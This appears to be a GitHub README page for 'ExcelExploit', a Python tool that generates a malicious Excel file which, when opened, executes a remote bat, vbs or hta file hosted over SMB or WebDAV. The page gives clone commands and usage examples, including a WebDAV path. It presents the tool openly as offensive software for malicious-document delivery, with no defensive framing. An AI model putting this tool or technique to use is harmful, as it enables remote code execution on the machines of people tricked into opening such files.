Skip to content

Latest commit

History

4 Commits

Folders and files

NameName
Last commit message
Last commit date

Repository files navigation


Excel Exploit



Create a malicious excel file that runs a remote file hosted via SMB or WebDAV

git clone https://github.com/TukoG/ExcelExploit
cd ExcelExploit

Usage

usage: main.py [-h] [--protocol exploit_file] [--output OUTPUT]
options:
-h, --help show this help message and exit
--protocol exploit_file, -p exploit_file
file to execute (bat,vbs,hta) --output OUTPUT, -o OUTPUT
output mal xlsx file (default: ./exloit.xlsx)
python3 main.py -h 
python main.py -p "file:///C:\test\test.vbs"
python main.py -p "file:///C:\test\test.vbs" -o mal.xlsx
python main.py -p "file:///\\127.0.0.1@8000/DavWWWRoot/test.vbs"

About

Create Excel files that run a remote files hosted via SMB , WebDAV ...

Topics

Resources

Stars

1 star

Watchers

1 watching

Forks

Contributors

Languages